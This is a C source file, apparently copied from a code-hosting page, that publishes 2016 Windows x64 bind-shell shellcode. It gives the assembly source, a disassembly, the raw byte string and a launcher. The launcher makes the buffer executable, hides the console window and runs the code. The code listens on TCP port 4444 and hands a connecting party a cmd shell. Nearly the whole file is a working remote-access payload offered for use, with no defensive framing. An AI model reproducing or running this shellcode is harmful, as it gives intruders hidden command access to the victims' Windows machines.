505 lines
No EOL
13 KiB
C
505 lines
No EOL
13 KiB
C
/*
|
|
# Title : Windows x64 Bind Shell TCP Shellcode
|
|
# size : 508 bytes
|
|
# Date : 08-12-2016
|
|
# Author : Roziul Hasan Khan Shifat
|
|
# Tested On : Windows 7 Professional x64
|
|
|
|
|
|
|
|
*/
|
|
|
|
|
|
/*
|
|
|
|
section .text
|
|
global _start
|
|
_start:
|
|
|
|
xor rdx,rdx
|
|
mov rax,[gs:rdx+0x60]
|
|
mov rsi,[rax+0x18]
|
|
mov rsi,[rsi+0x10]
|
|
lodsq
|
|
mov rsi,[rax]
|
|
mov r14,[rsi+0x30]
|
|
|
|
;----------------------
|
|
mov dl,0x88
|
|
mov ebx,[r14+0x3c]
|
|
add rbx,r14
|
|
mov ebx,[rbx+rdx]
|
|
add rbx,r14
|
|
|
|
;--------------------------
|
|
mov esi,[rbx+0x1c]
|
|
add rsi,r14 ;kernel32.dll base address
|
|
|
|
;-------------------------------
|
|
|
|
mov dx,832
|
|
mov ebx,[rsi+rdx*4]
|
|
add rbx,r14 ;LoadLibraryA()
|
|
;-------------------------------
|
|
|
|
|
|
mov dl,128
|
|
sub rsp,rdx
|
|
lea r12,[rsp]
|
|
|
|
;----------------------------------------------------
|
|
|
|
;loading ws2_32.dll
|
|
|
|
|
|
|
|
xor rdx,rdx
|
|
|
|
|
|
|
|
mov [r12],dword 'ws2_'
|
|
mov [r12+4],word '32'
|
|
mov [r12+6],byte dl
|
|
|
|
lea rcx,[r12]
|
|
|
|
sub rsp,88
|
|
|
|
call rbx
|
|
|
|
mov r15,rax ;ws2_32.dll base address
|
|
;--------------------------------------------------
|
|
xor rdx,rdx
|
|
mov dl,0x88
|
|
mov ebx,[r15+0x3c]
|
|
add rbx,r15
|
|
mov ebx,[rbx+rdx]
|
|
add rbx,r15
|
|
|
|
mov edi,[rbx+0x1c]
|
|
add rdi,r15
|
|
|
|
;------------------------------
|
|
|
|
|
|
mov dx,114*4
|
|
mov ebx,[rdi+rdx]
|
|
add rbx,r15 ;WSAStartup()
|
|
|
|
;-----------------------------------
|
|
;WSAStartup(514,&WSADATA)
|
|
|
|
|
|
|
|
|
|
xor rcx,rcx
|
|
mov cx,408
|
|
|
|
|
|
sub rsp,rcx
|
|
lea rdx,[rsp]
|
|
mov cx,514
|
|
|
|
sub rsp,88
|
|
|
|
call rbx
|
|
|
|
|
|
;-------------------------------------------
|
|
xor rdx,rdx
|
|
mov dx,98*4
|
|
mov ebx,[rdi+rdx]
|
|
add rbx,r15 ;WSASocketA()
|
|
|
|
;WSASocket(2,1,6,0,0,0)
|
|
|
|
push 6
|
|
push 1
|
|
push 2
|
|
|
|
pop rcx
|
|
pop rdx
|
|
pop r8
|
|
|
|
xor r9,r9
|
|
|
|
mov [rsp+32],r9
|
|
mov [rsp+40],r9
|
|
|
|
call rbx
|
|
|
|
mov r13,rax ;SOCKET
|
|
;--------------------------------------------
|
|
mov ebx,[rdi+80]
|
|
add rbx,r15 ;setsockopt()
|
|
|
|
;setsockopt(SOCKET,0xffff,4,&1,4)
|
|
xor rdx,rdx
|
|
mov rcx,r13
|
|
mov dx,0xffff
|
|
|
|
push 4
|
|
|
|
pop r8
|
|
|
|
mov [rsp],byte 1
|
|
lea r9,[rsp]
|
|
|
|
sub rsp,88
|
|
mov [rsp+32],r8
|
|
|
|
call rbx
|
|
|
|
;--------------------------------------------------
|
|
mov ebx,[rdi+4]
|
|
add rbx,r15 ;bind()
|
|
|
|
;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
|
|
|
|
|
|
push 16
|
|
pop r8
|
|
|
|
xor rdx,rdx
|
|
|
|
mov [r12],rdx
|
|
mov [r12+8],rdx
|
|
|
|
mov [r12],byte 2
|
|
mov [r12+2],word 0x5c11 ;port 4444 (change it if U want)
|
|
lea rdx,[r12]
|
|
|
|
mov rcx,r13
|
|
|
|
call rbx
|
|
;----------------------------------------
|
|
|
|
mov ebx,[rdi+48]
|
|
add rbx,r15 ;listen()
|
|
|
|
|
|
;listen(SOCKET,1)
|
|
|
|
push 1
|
|
pop rdx
|
|
|
|
push r13
|
|
pop rcx
|
|
|
|
call rbx
|
|
|
|
;-----------------------------------
|
|
|
|
mov ebx,[rdi]
|
|
add rbx,r15 ;accept()
|
|
|
|
;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
|
|
|
|
xor rdx,rdx
|
|
|
|
mov [r12],rdx
|
|
mov [r12+8],rdx
|
|
|
|
mov dl,16
|
|
push rdx
|
|
|
|
lea r8,[rsp]
|
|
|
|
|
|
lea rdx,[r12]
|
|
|
|
mov rcx,r13
|
|
|
|
sub rsp,88
|
|
call rbx
|
|
|
|
;-------------------------------------------
|
|
xor rdx,rdx
|
|
mov [r12],rdx
|
|
mov [r12+8],rdx
|
|
|
|
|
|
|
|
|
|
|
|
mov dl,104
|
|
|
|
xor rcx,rcx
|
|
mov [r12],dword edx
|
|
mov [r12+4],rcx
|
|
mov [r12+12],rcx
|
|
mov [r12+20],rcx
|
|
mov [r12+24],rcx
|
|
|
|
mov dl,255
|
|
inc rdx
|
|
|
|
mov [r12+0x3c],edx
|
|
mov [r12+0x50],rax
|
|
mov [r12+0x58],rax
|
|
mov [r12+0x60],rax
|
|
|
|
;--------------------------------------------------
|
|
|
|
mov [r12-4],dword 'cmdA'
|
|
mov [r12-1],byte cl
|
|
|
|
;-----------------------------------------
|
|
sub rsp,88
|
|
;CreateProcessA(NULL,"cmd",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFOMATION)
|
|
|
|
lea rdx,[r12-4] ;"cmd"
|
|
|
|
xor r8,r8 ;NULL
|
|
|
|
push r8
|
|
pop r9 ;NULL
|
|
|
|
mov [rsp+32],byte 1 ;TRUE
|
|
mov [rsp+40],r8 ;0
|
|
mov [rsp+48],r8 ;NULL
|
|
mov [rsp+56],r8 ;NULL
|
|
|
|
|
|
lea rax,[r12]
|
|
mov [rsp+64],rax
|
|
|
|
lea rax,[r12+104]
|
|
mov [rsp+72],rax
|
|
|
|
xor r10,r10
|
|
mov r10w,165*4
|
|
mov ebx,[rsi+r10]
|
|
add rbx,r14 ;CreateProcessA()
|
|
|
|
call rbx
|
|
|
|
;-----------------------------------------------
|
|
|
|
|
|
|
|
|
|
mov r10w,297*4
|
|
mov ebx,[rsi+r10]
|
|
add rbx,r14
|
|
|
|
push 1
|
|
pop rcx
|
|
|
|
add rsp,88
|
|
call rbx
|
|
|
|
|
|
|
|
|
|
*/
|
|
|
|
|
|
|
|
/*
|
|
|
|
|
|
file format pe-x86-64
|
|
|
|
|
|
Disassembly of section .text:
|
|
|
|
0000000000000000 <_start>:
|
|
0: 48 31 d2 xor %rdx,%rdx
|
|
3: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
|
|
8: 48 8b 70 18 mov 0x18(%rax),%rsi
|
|
c: 48 8b 76 10 mov 0x10(%rsi),%rsi
|
|
10: 48 ad lods %ds:(%rsi),%rax
|
|
12: 48 8b 30 mov (%rax),%rsi
|
|
15: 4c 8b 76 30 mov 0x30(%rsi),%r14
|
|
19: b2 88 mov $0x88,%dl
|
|
1b: 41 8b 5e 3c mov 0x3c(%r14),%ebx
|
|
1f: 4c 01 f3 add %r14,%rbx
|
|
22: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
|
|
25: 4c 01 f3 add %r14,%rbx
|
|
28: 8b 73 1c mov 0x1c(%rbx),%esi
|
|
2b: 4c 01 f6 add %r14,%rsi
|
|
2e: 66 ba 40 03 mov $0x340,%dx
|
|
32: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
|
|
35: 4c 01 f3 add %r14,%rbx
|
|
38: b2 80 mov $0x80,%dl
|
|
3a: 48 29 d4 sub %rdx,%rsp
|
|
3d: 4c 8d 24 24 lea (%rsp),%r12
|
|
41: 48 31 d2 xor %rdx,%rdx
|
|
44: 41 c7 04 24 77 73 32 movl $0x5f327377,(%r12)
|
|
4b: 5f
|
|
4c: 66 41 c7 44 24 04 33 movw $0x3233,0x4(%r12)
|
|
53: 32
|
|
54: 41 88 54 24 06 mov %dl,0x6(%r12)
|
|
59: 49 8d 0c 24 lea (%r12),%rcx
|
|
5d: 48 83 ec 58 sub $0x58,%rsp
|
|
61: ff d3 callq *%rbx
|
|
63: 49 89 c7 mov %rax,%r15
|
|
66: 48 31 d2 xor %rdx,%rdx
|
|
69: b2 88 mov $0x88,%dl
|
|
6b: 41 8b 5f 3c mov 0x3c(%r15),%ebx
|
|
6f: 4c 01 fb add %r15,%rbx
|
|
72: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
|
|
75: 4c 01 fb add %r15,%rbx
|
|
78: 8b 7b 1c mov 0x1c(%rbx),%edi
|
|
7b: 4c 01 ff add %r15,%rdi
|
|
7e: 66 ba c8 01 mov $0x1c8,%dx
|
|
82: 8b 1c 17 mov (%rdi,%rdx,1),%ebx
|
|
85: 4c 01 fb add %r15,%rbx
|
|
88: 48 31 c9 xor %rcx,%rcx
|
|
8b: 66 b9 98 01 mov $0x198,%cx
|
|
8f: 48 29 cc sub %rcx,%rsp
|
|
92: 48 8d 14 24 lea (%rsp),%rdx
|
|
96: 66 b9 02 02 mov $0x202,%cx
|
|
9a: 48 83 ec 58 sub $0x58,%rsp
|
|
9e: ff d3 callq *%rbx
|
|
a0: 48 31 d2 xor %rdx,%rdx
|
|
a3: 66 ba 88 01 mov $0x188,%dx
|
|
a7: 8b 1c 17 mov (%rdi,%rdx,1),%ebx
|
|
aa: 4c 01 fb add %r15,%rbx
|
|
ad: 6a 06 pushq $0x6
|
|
af: 6a 01 pushq $0x1
|
|
b1: 6a 02 pushq $0x2
|
|
b3: 59 pop %rcx
|
|
b4: 5a pop %rdx
|
|
b5: 41 58 pop %r8
|
|
b7: 4d 31 c9 xor %r9,%r9
|
|
ba: 4c 89 4c 24 20 mov %r9,0x20(%rsp)
|
|
bf: 4c 89 4c 24 28 mov %r9,0x28(%rsp)
|
|
c4: ff d3 callq *%rbx
|
|
c6: 49 89 c5 mov %rax,%r13
|
|
c9: 8b 5f 50 mov 0x50(%rdi),%ebx
|
|
cc: 4c 01 fb add %r15,%rbx
|
|
cf: 48 31 d2 xor %rdx,%rdx
|
|
d2: 4c 89 e9 mov %r13,%rcx
|
|
d5: 66 ba ff ff mov $0xffff,%dx
|
|
d9: 6a 04 pushq $0x4
|
|
db: 41 58 pop %r8
|
|
dd: c6 04 24 01 movb $0x1,(%rsp)
|
|
e1: 4c 8d 0c 24 lea (%rsp),%r9
|
|
e5: 48 83 ec 58 sub $0x58,%rsp
|
|
e9: 4c 89 44 24 20 mov %r8,0x20(%rsp)
|
|
ee: ff d3 callq *%rbx
|
|
f0: 8b 5f 04 mov 0x4(%rdi),%ebx
|
|
f3: 4c 01 fb add %r15,%rbx
|
|
f6: 6a 10 pushq $0x10
|
|
f8: 41 58 pop %r8
|
|
fa: 48 31 d2 xor %rdx,%rdx
|
|
fd: 49 89 14 24 mov %rdx,(%r12)
|
|
101: 49 89 54 24 08 mov %rdx,0x8(%r12)
|
|
106: 41 c6 04 24 02 movb $0x2,(%r12)
|
|
10b: 66 41 c7 44 24 02 11 movw $0x5c11,0x2(%r12)
|
|
112: 5c
|
|
113: 49 8d 14 24 lea (%r12),%rdx
|
|
117: 4c 89 e9 mov %r13,%rcx
|
|
11a: ff d3 callq *%rbx
|
|
11c: 8b 5f 30 mov 0x30(%rdi),%ebx
|
|
11f: 4c 01 fb add %r15,%rbx
|
|
122: 6a 01 pushq $0x1
|
|
124: 5a pop %rdx
|
|
125: 41 55 push %r13
|
|
127: 59 pop %rcx
|
|
128: ff d3 callq *%rbx
|
|
12a: 8b 1f mov (%rdi),%ebx
|
|
12c: 4c 01 fb add %r15,%rbx
|
|
12f: 48 31 d2 xor %rdx,%rdx
|
|
132: 49 89 14 24 mov %rdx,(%r12)
|
|
136: 49 89 54 24 08 mov %rdx,0x8(%r12)
|
|
13b: b2 10 mov $0x10,%dl
|
|
13d: 52 push %rdx
|
|
13e: 4c 8d 04 24 lea (%rsp),%r8
|
|
142: 49 8d 14 24 lea (%r12),%rdx
|
|
146: 4c 89 e9 mov %r13,%rcx
|
|
149: 48 83 ec 58 sub $0x58,%rsp
|
|
14d: ff d3 callq *%rbx
|
|
14f: 48 31 d2 xor %rdx,%rdx
|
|
152: 49 89 14 24 mov %rdx,(%r12)
|
|
156: 49 89 54 24 08 mov %rdx,0x8(%r12)
|
|
15b: b2 68 mov $0x68,%dl
|
|
15d: 48 31 c9 xor %rcx,%rcx
|
|
160: 41 89 14 24 mov %edx,(%r12)
|
|
164: 49 89 4c 24 04 mov %rcx,0x4(%r12)
|
|
169: 49 89 4c 24 0c mov %rcx,0xc(%r12)
|
|
16e: 49 89 4c 24 14 mov %rcx,0x14(%r12)
|
|
173: 49 89 4c 24 18 mov %rcx,0x18(%r12)
|
|
178: b2 ff mov $0xff,%dl
|
|
17a: 48 ff c2 inc %rdx
|
|
17d: 41 89 54 24 3c mov %edx,0x3c(%r12)
|
|
182: 49 89 44 24 50 mov %rax,0x50(%r12)
|
|
187: 49 89 44 24 58 mov %rax,0x58(%r12)
|
|
18c: 49 89 44 24 60 mov %rax,0x60(%r12)
|
|
191: 41 c7 44 24 fc 63 6d movl $0x41646d63,-0x4(%r12)
|
|
198: 64 41
|
|
19a: 41 88 4c 24 ff mov %cl,-0x1(%r12)
|
|
19f: 48 83 ec 58 sub $0x58,%rsp
|
|
1a3: 49 8d 54 24 fc lea -0x4(%r12),%rdx
|
|
1a8: 4d 31 c0 xor %r8,%r8
|
|
1ab: 41 50 push %r8
|
|
1ad: 41 59 pop %r9
|
|
1af: c6 44 24 20 01 movb $0x1,0x20(%rsp)
|
|
1b4: 4c 89 44 24 28 mov %r8,0x28(%rsp)
|
|
1b9: 4c 89 44 24 30 mov %r8,0x30(%rsp)
|
|
1be: 4c 89 44 24 38 mov %r8,0x38(%rsp)
|
|
1c3: 49 8d 04 24 lea (%r12),%rax
|
|
1c7: 48 89 44 24 40 mov %rax,0x40(%rsp)
|
|
1cc: 49 8d 44 24 68 lea 0x68(%r12),%rax
|
|
1d1: 48 89 44 24 48 mov %rax,0x48(%rsp)
|
|
1d6: 4d 31 d2 xor %r10,%r10
|
|
1d9: 66 41 ba 94 02 mov $0x294,%r10w
|
|
1de: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx
|
|
1e2: 4c 01 f3 add %r14,%rbx
|
|
1e5: ff d3 callq *%rbx
|
|
1e7: 66 41 ba a4 04 mov $0x4a4,%r10w
|
|
1ec: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx
|
|
1f0: 4c 01 f3 add %r14,%rbx
|
|
1f3: 6a 01 pushq $0x1
|
|
1f5: 59 pop %rcx
|
|
1f6: 48 83 c4 58 add $0x58,%rsp
|
|
1fa: ff d3 callq *%rbx
|
|
|
|
|
|
|
|
|
|
|
|
*/
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#include<windows.h>
|
|
#include<stdio.h>
|
|
#include<string.h>
|
|
|
|
|
|
char shellcode[]=\
|
|
|
|
"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x4c\x8b\x76\x30\xb2\x88\x41\x8b\x5e\x3c\x4c\x01\xf3\x8b\x1c\x13\x4c\x01\xf3\x8b\x73\x1c\x4c\x01\xf6\x66\xba\x40\x03\x8b\x1c\x96\x4c\x01\xf3\xb2\x80\x48\x29\xd4\x4c\x8d\x24\x24\x48\x31\xd2\x41\xc7\x04\x24\x77\x73\x32\x5f\x66\x41\xc7\x44\x24\x04\x33\x32\x41\x88\x54\x24\x06\x49\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x49\x89\xc7\x48\x31\xd2\xb2\x88\x41\x8b\x5f\x3c\x4c\x01\xfb\x8b\x1c\x13\x4c\x01\xfb\x8b\x7b\x1c\x4c\x01\xff\x66\xba\xc8\x01\x8b\x1c\x17\x4c\x01\xfb\x48\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x8d\x14\x24\x66\xb9\x02\x02\x48\x83\xec\x58\xff\xd3\x48\x31\xd2\x66\xba\x88\x01\x8b\x1c\x17\x4c\x01\xfb\x6a\x06\x6a\x01\x6a\x02\x59\x5a\x41\x58\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x4c\x89\x4c\x24\x28\xff\xd3\x49\x89\xc5\x8b\x5f\x50\x4c\x01\xfb\x48\x31\xd2\x4c\x89\xe9\x66\xba\xff\xff\x6a\x04\x41\x58\xc6\x04\x24\x01\x4c\x8d\x0c\x24\x48\x83\xec\x58\x4c\x89\x44\x24\x20\xff\xd3\x8b\x5f\x04\x4c\x01\xfb\x6a\x10\x41\x58\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\x41\xc6\x04\x24\x02\x66\x41\xc7\x44\x24\x02\x11\x5c\x49\x8d\x14\x24\x4c\x89\xe9\xff\xd3\x8b\x5f\x30\x4c\x01\xfb\x6a\x01\x5a\x41\x55\x59\xff\xd3\x8b\x1f\x4c\x01\xfb\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\xb2\x10\x52\x4c\x8d\x04\x24\x49\x8d\x14\x24\x4c\x89\xe9\x48\x83\xec\x58\xff\xd3\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\xb2\x68\x48\x31\xc9\x41\x89\x14\x24\x49\x89\x4c\x24\x04\x49\x89\x4c\x24\x0c\x49\x89\x4c\x24\x14\x49\x89\x4c\x24\x18\xb2\xff\x48\xff\xc2\x41\x89\x54\x24\x3c\x49\x89\x44\x24\x50\x49\x89\x44\x24\x58\x49\x89\x44\x24\x60\x41\xc7\x44\x24\xfc\x63\x6d\x64\x41\x41\x88\x4c\x24\xff\x48\x83\xec\x58\x49\x8d\x54\x24\xfc\x4d\x31\xc0\x41\x50\x41\x59\xc6\x44\x24\x20\x01\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\x4c\x89\x44\x24\x38\x49\x8d\x04\x24\x48\x89\x44\x24\x40\x49\x8d\x44\x24\x68\x48\x89\x44\x24\x48\x4d\x31\xd2\x66\x41\xba\x94\x02\x42\x8b\x1c\x16\x4c\x01\xf3\xff\xd3\x66\x41\xba\xa4\x04\x42\x8b\x1c\x16\x4c\x01\xf3\x6a\x01\x59\x48\x83\xc4\x58\xff\xd3";
|
|
|
|
|
|
int main()
|
|
{
|
|
int len=strlen(shellcode);
|
|
DWORD l=0;
|
|
printf("shellcode length : %d\n",len);
|
|
|
|
//making memory executbale
|
|
VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);
|
|
|
|
|
|
//hiding windows
|
|
|
|
AllocConsole();
|
|
ShowWindow(FindWindowA("ConsoleWindowClass",NULL),0);
|
|
|
|
//
|
|
|
|
(* (int(*)()) shellcode)();
|
|
|
|
return 0;
|
|
|
|
} |